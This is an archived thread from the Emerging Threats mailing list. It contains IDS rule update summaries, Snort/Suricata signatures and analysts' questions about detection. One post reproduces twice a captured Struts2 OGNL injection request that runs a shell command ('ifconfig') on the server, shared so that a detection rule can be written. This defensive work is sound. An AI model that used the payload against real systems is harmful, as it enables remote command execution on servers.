Pierre Schweitzer | 30 Jan 10:23 2015

WPScan

Dear all,

I was wondering about the need to make an ET rules to detect a WPScan
usage against a possible WordPress installation. I made the test and so
far, it remains unseen, whereas it could be a potential scan prior to an
attack.

WPScan is using an UA such as: WPScan v2.6 (http://wpscan.org)
Also, it will try to open the readme.html (or readme.txt|TXT) of the WP
installation and will also do this for any theme installed (in
wp-content/themes/*/readme.txt|TXT).

It will also try to find a suitable wp-config.php file (looking for
old/backup as well), along with the xmlrpc.php file.

I can provide the complete trace upon request.

Cheers,
--

-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.
Francis Trudeau | 29 Jan 23:14 2015
Picon

Daily Ruleset Update Summary 2015/01/29

 [***] Summary: [***]

 4 new Open, 22 new Pro signatures (4 + 18).  D-Link DSL-2740R vuln,
SiR-DoOoM, KJw0rm, Citroni/CTB Locker, Kakfum.

 Thanks:  Eoin Miller, Wbbigdave,  <at> rmkml,  <at> abuse_ch, and  <at> spookerlabs.

 [+++]          Added rules:          [+++]

 Open:

  2020329 - ET TROJAN Unknown Mailer CnC Beacon 2 (trojan.rules)
  2020330 - ET TROJAN Unknown Mailer CnC Beacon (trojan.rules)
  2020331 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020332 - ET CURRENT_EVENTS Possible PHISH Dropbox - Landing Page -
Title over non SSL (current_events.rules)

 Pro:

  2809624 - ETPRO EXPLOIT D-Link DSL-2740R Remote DNS Change Attempt
(exploit.rules)
  2809625 - ETPRO TROJAN VBS/Jenxcus.A Checkin (trojan.rules)
  2809626 - ETPRO TROJAN SiR-DoOoM worm User-Agent (trojan.rules)
  2809627 - ETPRO TROJAN KJw0rm User-Agent (trojan.rules)
  2809628 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon (trojan.rules)
  2809629 - ETPRO TROJAN KJw0rm CnC Beacon (trojan.rules)
  2809630 - ETPRO TROJAN SiR-DoOoM worm CnC Beacon Response (trojan.rules)
  2809631 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809632 - ETPRO MOBILE_MALWARE Android Hideicon Download
(Continue reading)

Victor Julien | 29 Jan 18:41 2015
Picon

Suricata 2.1beta3 Available!

The OISF development team is proud to announce Suricata 2.1beta3. This
is the third beta release for the upcoming 2.1 version. It should be
considered a development snapshot for the 2.1 branch.

Get the new release here:
http://www.openinfosecfoundation.org/download/suricata-2.1beta3.tar.gz

New features

Feature #1309: Lua support for Stats output
Feature #1310: Modbus parsing and matching

Improvements

Optimization #1339: flow timeout optimization
Optimization #1371: mpm optimization
Feature #1317: Lua: Indicator for end of flow
Feature #1333: unix-socket: allow (easier) non-root usage
Feature #1261: Request for Additional Lua Capabilities

Bug fixes

Bug #977: WARNING on empty rules file is fatal (should not be)
Bug #1184: pfring: cppcheck warnings
Bug #1321: Flow memuse bookkeeping error
Bug #1327: pcre pkt/flowvar capture broken for non-relative matches (master)
Bug #1332: cppcheck: ioctl
Bug #1336: modbus: CID 1257762: Logically dead code (DEADCODE)
Bug #1351: output-json: duplicate logging (2.1.x)
Bug #1354: coredumps on quitting on OpenBSD
(Continue reading)

Francis Trudeau | 28 Jan 23:57 2015
Picon

Daily Ruleset Update Summary 2015/01/28

 [***] Summary: [***]

 9 new Open sigs, 32 new Pro (9 + 23).  Job314/Neutrino, CVE-2015-0235
Exim vuln, Wordpress PingBack GHOST.

 Thanks:Pierre Schweitzer, Kevin Ross,  <at> abuse_ch, and UT Austin
Information Security Office.

 [+++]          Added rules:          [+++]

 Open:

  2020320 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27
2015 (current_events.rules)
  2020321 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Landing Jan 27
2015 (current_events.rules)
  2020322 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020323 - ET WEB_SERVER Heimdallbot Attack Tool Inbound (web_server.rules)
  2020324 - ET POLICY Onion2Web Tor Proxy Cookie (policy.rules)
  2020325 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2020326 - ET EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2020327 - ET WEB_SPECIFIC_APPS Wordpress PingBack Possbile GHOST
attempt (web_specific_apps.rules)
  2020328 - ET CURRENT_EVENTS Possible Dridex Campaign Download Jan 28
2014 (current_events.rules)

 Pro:
(Continue reading)

Kevin Ross | 28 Jan 16:14 2015

SIGS: ET TROJAN Symmi.22722 & ET POLICY Onion2Web Cookie

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Symmi.22722 CnC Beacon"; flow:established,to_server; content:"/index.php?email="; fast_pattern; http_uri; content:"&method="; http_uri; content:"&len"; http_uri; content:!"Referer|3A|"; http_header; content:!"User-Agent|3A|"; http_header; classtype:trojan-activity; reference:md5,062da1efea7bce620a2b925b53d818c5; sid:156611; rev;1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Onion2Web Cookie"; flow:established,to_server; content:"onion2web_confirmed="; http_cookie; fast_pattern:only; classtype:policy-violation; reference:md5,a46e609662eb94a726fcb4471b7057d4; reference:md5,2b62cdb6bcec4bff47eff437e4fc46d3; reference:url,github.com/starius/onion2web; sid:156612; rev;1;)


Kind Regards,
Kevin Ross
<div><div dir="ltr">
<div>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Symmi.22722 CnC Beacon"; flow:established,to_server; content:"/index.php?email="; fast_pattern; http_uri; content:"&amp;method="; http_uri; content:"&amp;len"; http_uri; content:!"Referer|3A|"; http_header; content:!"User-Agent|3A|"; http_header; classtype:trojan-activity; reference:md5,062da1efea7bce620a2b925b53d818c5; sid:156611; rev;1;)<br><br>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Onion2Web Cookie"; flow:established,to_server; content:"onion2web_confirmed="; http_cookie; fast_pattern:only; classtype:policy-violation; reference:md5,a46e609662eb94a726fcb4471b7057d4; reference:md5,2b62cdb6bcec4bff47eff437e4fc46d3; reference:url,<a href="http://github.com/starius/onion2web">github.com/starius/onion2web</a>; sid:156612; rev;1;) <br><br><br>
</div>Kind Regards,<br>Kevin Ross<br>
</div></div>
Pierre Schweitzer | 28 Jan 10:00 2015

Heimdallbot

Dear all,

We spotted yesterday totally non-legit traffic coming from an
Alibaba-Inc IP on our infrastructure. ET rules were capable of matching
most of its vulnerabilities exploitation attempts. But it seems that one
of the requests wasn't caught by ET.
I'm sharing it here, if it's possible to design a rule. It's obviously
definitely not legit. It was apparently targeting phpBB (for that
specific query).

/forum/memberlist.php?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d%40java.util.Collections%40EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27ifconfig%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d%40org.apache.struts2.ServletActionContext%40getResponse%2
8%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023%27heimdall181%27%29%27%29%28bla%29%29

I'm talking about heimdall here, because the UA for all the requests
was: Mozilla/5.0 compatible;Heimdallbot/3.0;+AlibabaGroup
And also not the println in the request.

If anyone has information, or wants more query that were made by that
bot, be welcome.

With my best regards,
-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.

Attachment (smime.p7s): application/pkcs7-signature, 5783 bytes
Dear all,

We spotted yesterday totally non-legit traffic coming from an
Alibaba-Inc IP on our infrastructure. ET rules were capable of matching
most of its vulnerabilities exploitation attempts. But it seems that one
of the requests wasn't caught by ET.
I'm sharing it here, if it's possible to design a rule. It's obviously
definitely not legit. It was apparently targeting phpBB (for that
specific query).

/forum/memberlist.php?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d%40java.util.Collections%40EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27ifconfig%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d%40java.lang.Runtime%40getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d%40org.apache.struts2.ServletActionContext%40getResponse%2
8%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023%27heimdall181%27%29%27%29%28bla%29%29

I'm talking about heimdall here, because the UA for all the requests
was: Mozilla/5.0 compatible;Heimdallbot/3.0;+AlibabaGroup
And also not the println in the request.

If anyone has information, or wants more query that were made by that
bot, be welcome.

With my best regards,
--

-- 
Pierre Schweitzer <pierre@...>
System & Network Administrator
Senior Kernel Developer
ReactOS Deutschland e.V.

Francis Trudeau | 27 Jan 23:23 2015
Picon

Daily Ruleset Update Summary 2015/01/27

 [***] Summary: [***]

 2 new Open signatures, 11 new Pro (2 + 9).  FerretCMS SQLi, SmartCMS
SQLi, CVE-2015-0235 Exim buffer overflow.

 Thanks:   <at> rmkml

 [+++]          Added rules:          [+++]

 Open:

  2020315 - ET TROJAN KL-Remote / Cryp_Banker14 RAT connection (trojan.rules)
  2020316 - ET TROJAN KL-Remote / Cryp_Banker14 RAT response (trojan.rules)

 Pro:

  2809592 - ETPRO WEB_SPECIFIC_APPS FerretCMS SQLi Attempt
(web_specific_apps.rules)
  2809593 - ETPRO WEB_SPECIFIC_APPS SmartCMS SQLi Attempt
(web_specific_apps.rules)
  2809594 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a
Uploading Info via FTP (mobile_malware.rules)
  2809595 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Logisr.a Checkin
(mobile_malware.rules)
  2809596 - ETPRO MOBILE_MALWARE Android.Riskware.SmsPay.EX Checkin
(mobile_malware.rules)
  2809597 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(EHLO) (exploit.rules)
  2809598 - ETPRO EXPLOIT CVE-2015-0235 Exim Buffer Overflow Attempt
(HELO) (exploit.rules)
  2809599 - ETPRO TROJAN KazyBot Checkin (trojan.rules)
  2809600 - ETPRO MALWARE Win32/SoftPulse.P HTTP Request (malware.rules)

 [///]     Modified active rules:     [///]

  2014726 - ET POLICY Outdated Windows Flash Version IE (policy.rules)
  2014727 - ET POLICY Outdated Mac Flash Version (policy.rules)
  2020300 - ET CURRENT_EVENTS DRIVEBY Nuclear EK Exploit Struct Jan 23
2015 (current_events.rules)
  2808129 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.Agent.gl Checkin
(mobile_malware.rules)
Olude, GB A | 27 Jan 23:17 2015

ET CURRENT_EVENTS Possible Upatre SSL Cert ventureonsite.com

Hi Folks,

 

Looking at some traffic around this domain/signature. Can you please assist with additional detail on which Upatre campaign used this?

Any info on md5 or actual upatre sample would be immensely appreciated.

 

Thanks,

GB




NOTICE: Morgan Stanley is not acting as a municipal advisor and the opinions or views contained herein are not intended to be, and do not constitute, advice within the meaning of Section 975 of the Dodd-Frank Wall Street Reform and Consumer Protection Act. If you have received this communication in error, please destroy all electronic and paper copies; do not disclose, use or act upon the information; and notify the sender immediately. Mistransmission is not intended to waive confidentiality or privilege. Morgan Stanley reserves the right, to the extent permitted under applicable law, to monitor electronic communications. This message is subject to terms available at the following link: http://www.morganstanley.com/disclaimers If you cannot access these links, please notify us by reply message and we will send the contents to you. By messaging with Morgan Stanley you consent to the foregoing.

<div>
<p>
</p>
<div class="WordSection1">
<p class="MsoNormal"><span>Hi Folks,<p></p></span></p>
<p class="MsoNormal"><span><p>&nbsp;</p></span></p>
<p class="MsoNormal"><span>Looking at some traffic around this domain/signature. Can you please assist with additional detail on which Upatre campaign used this?<p></p></span></p>
<p class="MsoNormal"><span>Any info on md5 or actual upatre sample would be immensely appreciated.<p></p></span></p>
<p class="MsoNormal"><span><p>&nbsp;</p></span></p>
<p class="MsoNormal"><span>Thanks,<p></p></span></p>
<p class="MsoNormal"><span>GB<p></p></span></p>
</div>
<br><br><br><span>NOTICE: 
Morgan Stanley is not acting as a municipal advisor and the opinions or views 
contained herein are not intended to be, and do not constitute, advice within 
the meaning of Section 975 of the Dodd-Frank Wall Street Reform and Consumer 
Protection Act. If you have received this communication in error, please destroy 
all electronic and paper copies; do not disclose, use or act upon the 
information; and notify the sender immediately. Mistransmission is not intended 
to waive confidentiality or privilege. Morgan Stanley reserves the right, to the 
extent permitted under applicable law, to monitor electronic communications. 
This message is subject to terms available at the following link: <a href="http://www.morganstanley.com/disclaimers">http://www.morganstanley.com/disclaimers</a> 
If you cannot access these links, please notify us by reply message and we will 
send the contents to you. By messaging with Morgan Stanley you consent to the 
foregoing.</span><br><p></p>
<p></p>
<p></p>
</div>
Francis Trudeau | 26 Jan 23:23 2015
Picon

Daily Ruleset Update Summary 2015/01/26

 [***] Summary: [***]

 5 new Open signatures, 22 new Pro (5 + 17).  Regin, Dyre, PlugX,
Citroni/CTB locker.

 Thanks:   <at> rmkml, black_ip and  <at> abuse_ch

 [+++]          Added rules:          [+++]

 Open:

  2020308 - ET TROJAN Dyre Downloading Mailer (trojan.rules)
  2020309 - ET TROJAN Regin Hopscotch Module Accessing SMB2 Named Pipe
(Unicode) 1 (trojan.rules)
  2020310 - ET TROJAN Regin Hopscotch Module Accessing SMB Named Pipe
(Unicode) 2 (trojan.rules)
  2020313 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)
  2020314 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)

 Pro:

  2809575 - ETPRO TROJAN Potential PlugX DNS Command and Control via
TXT queries (trojan.rules)
  2809576 - ETPRO EXPLOIT Arris Cable Modem Backdoor Cookie 2 (exploit.rules)
  2809577 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809578 - ETPRO TROJAN Critroni Variant .onion Proxy Domain (trojan.rules)
  2809579 - ETPRO TROJAN Win32/Sality.AT Checkin (trojan.rules)
  2809580 - ETPRO TROJAN Python.a Checkin (trojan.rules)
  2809581 - ETPRO TROJAN WIN32/ZUPDAX.A!DHA Checkin (trojan.rules)
  2809582 - ETPRO MOBILE_MALWARE RiskTool.AndroidOS.SMSreg.ja Checkin
(mobile_malware.rules)
  2809583 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.SmForw.m Checkin
3 (mobile_malware.rules)
  2809584 - ETPRO MOBILE_MALWARE Android.Trojan.Banker.Z Checkin
(mobile_malware.rules)
  2809585 - ETPRO MOBILE_MALWARE Android.Riskware.SMSReg.EI Checkin
(mobile_malware.rules)
  2809586 - ETPRO TROJAN Win32/Neshta.A Checkin 4 (trojan.rules)
  2809587 - ETPRO TROJAN Win32/Spy.Agent.OLV Checkin (trojan.rules)
  2809588 - ETPRO TROJAN W32/Sourtoff Receiving Config (trojan.rules)
  2809589 - ETPRO MOBILE_MALWARE Android.Trojan.SMSSend.SO Checkin
(mobile_malware.rules)
  2809590 - ETPRO MOBILE_MALWARE RiskTool.AndroidOS.Frime.a Checkin
(mobile_malware.rules)
  2809591 - ETPRO MOBILE_MALWARE Android.Riskware.SMSReg.DL Checkin
(mobile_malware.rules)

 [///]     Modified active rules:     [///]

  2015891 - ET CURRENT_EVENTS CoolEK - Landing Page - Title
(current_events.rules)
  2019764 - ET CURRENT_EVENTS Job314/Neutrino Reboot EK Payload Nov 20
2014 (current_events.rules)
  2020212 - ET CURRENT_EVENTS Upatre Redirector IE Requesting Payload
Jan 19 2015 (current_events.rules)
  2805820 - ETPRO MOBILE_MALWARE Android/FkToken.A Checkin
(mobile_malware.rules)

 [---]         Removed rules:         [---]

  2015501 - ET TROJAN ProxyBox - HTTP CnC - Checkin Response (trojan.rules)
  2015815 - ET CURRENT_EVENTS CoolEK Font File Download (32-bit Host)
Dec 11 2012 (current_events.rules)
  2015816 - ET CURRENT_EVENTS CoolEK Font File Download (64-bit Host)
Dec 11 2012 (current_events.rules)
  2015892 - ET CURRENT_EVENTS CoolEK - PDF Exploit - pdf_new.php
(current_events.rules)
  2016059 - ET CURRENT_EVENTS CoolEK - Old PDF Exploit - Dec 18 2012
(current_events.rules)
  2016278 - ET CURRENT_EVENTS CoolEK - New PDF Exploit - Jan 24 2013
(current_events.rules)
  2016547 - ET CURRENT_EVENTS CoolEK Payload Download (6) (current_events.rules)
  2016559 - ET CURRENT_EVENTS CoolEK Payload Download (7) (current_events.rules)
  2016782 - ET CURRENT_EVENTS CoolEK Payload Download (8) (current_events.rules)
  2020283 - ET TROJAN DNS Query for Suspicious torwoman.com Domain -
Possible CryptoWall Activity (trojan.rules)
  2808452 - ETPRO MOBILE_MALWARE Trojan-Banker.AndroidOS.Faketoken.a
Checkin 2 (mobile_malware.rules)
Paul Halliday | 26 Jan 16:20 2015
Picon

Coverage for adobe flash player vuln

I see sid 2014726 but it looks like it is anchored to MSIE. The
advisory includes FF as well. Are there other sigs I should be paying
particular attention to?

Thanks!

--

-- 
Paul Halliday
http://www.pintumbler.org/
Francis Trudeau | 23 Jan 22:10 2015
Picon

Daily Ruleset Update Summary 2015/01/23

 [***] Summary: [***]

 14 new Open signatures, 16 new Pro (14 + 2).  Dridex, Scieron,
Upatre, Win32/Zemot.

 Thanks:  Kevin Ross, Jack Mott, Nathan Fowler,  <at> kafeine,  <at> EKWatcher,
 <at> jaimeblascob and  <at> abuse_ch

 [+++]          Added rules:          [+++]

 Open:

  2020293 - ET TROJAN W32/Adrom.Backdoor CnC Beacon (trojan.rules)
  2020294 - ET TROJAN W32/Upatre.Downloader Encoded Binary Download
Request (trojan.rules)
  2020295 - ET TROJAN Common Upatre Header Structure 3 (trojan.rules)
  2020296 - ET TROJAN Scieron Retrieving Information (trojan.rules)
  2020297 - ET TROJAN Scieron Retrieving Information Response (trojan.rules)
  2020298 - ET TROJAN Win32/Scieron-A UA (HTClient) (trojan.rules)
  2020299 - ET TROJAN Win32/Scieron-A Checkin via HTTP POST (trojan.rules)
  2020301 - ET TROJAN Dridex POST CnC Beacon 2 (trojan.rules)
  2020302 - ET TROJAN Dridex Post Checkin Activity 2 (trojan.rules)
  2020303 - ET TROJAN W32/AGENT.NXNX Checkin 2 (trojan.rules)
  2020304 - ET CURRENT_EVENTS Upatre Redirector Jan 23 2015
(current_events.rules)
  2020305 - ET DOS MC-SQLR Response Outbound Possible DDoS
Participation (dos.rules)
  2020306 - ET DOS MC-SQLR Response Inbound Possible DDoS Target (dos.rules)
  2020307 - ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate
detected (KINS CnC) (trojan.rules)

 Pro:

  2809573 - ETPRO TROJAN Win32/Zemot Requesting PE (trojan.rules)
  2809574 - ETPRO TROJAN Mal/Banker-EV CnC Beacon (trojan.rules)

 [///]     Modified active rules:     [///]

  2019964 - ET TROJAN W32/AGENT.NXNX checkin (trojan.rules)
  2020160 - ET CURRENT_EVENTS Upatre IE Redirector Receiving Payload
Jan 9 2015 (current_events.rules)
  2020205 - ET TROJAN Possible Mailer Dropped by Dyre SSL Cert (trojan.rules)
  2020212 - ET CURRENT_EVENTS Upatre Redirector IE Requesting Payload
Jan 19 2015 (current_events.rules)
  2809564 - ETPRO TROJAN Win32/Zemot Checkin 2 (trojan.rules)

Gmane